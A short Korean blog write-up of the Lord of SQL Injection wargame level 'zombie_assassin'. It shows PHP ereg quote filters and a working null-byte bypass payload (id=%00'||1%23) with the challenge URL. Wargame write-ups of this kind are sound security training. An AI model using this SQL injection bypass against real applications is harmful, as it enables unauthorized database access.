if(@ereg("'",$_GET[id])) exit("HeHe");
if(@ereg("'",$_GET[pw])) exit("HeHe");
if(@ereg("'",$_GET[pw])) exit("HeHe");
ereg가 있다.
존나 취약하다
ereg 와 eregi는 존나 취약하다
ereg는 null값까지만 받고
떄문에 %00을 넣어주고
id=%00'||1%23
해주게 되면 id를 그만 입력받고 뒤에 값을 || 연산한후 뒤에 쿼리를 주석처리해 버린다.
http://los.sandbox.cash/chall/zombie_assassin_eb9c4ab86b8c26748f3ce3e91dcd4dd8.php?id=%00%27||1%23
'War Game > LOS' 카테고리의 다른 글
| LOS DARK_EYES (0) | 2015.10.24 |
|---|---|
| LOS SUCCUBUS (0) | 2015.10.23 |
| LOS ASSASSIN (0) | 2015.10.23 |
| LOS GIANT (0) | 2015.10.23 |
| LOS BUGBEAR (0) | 2015.10.22 |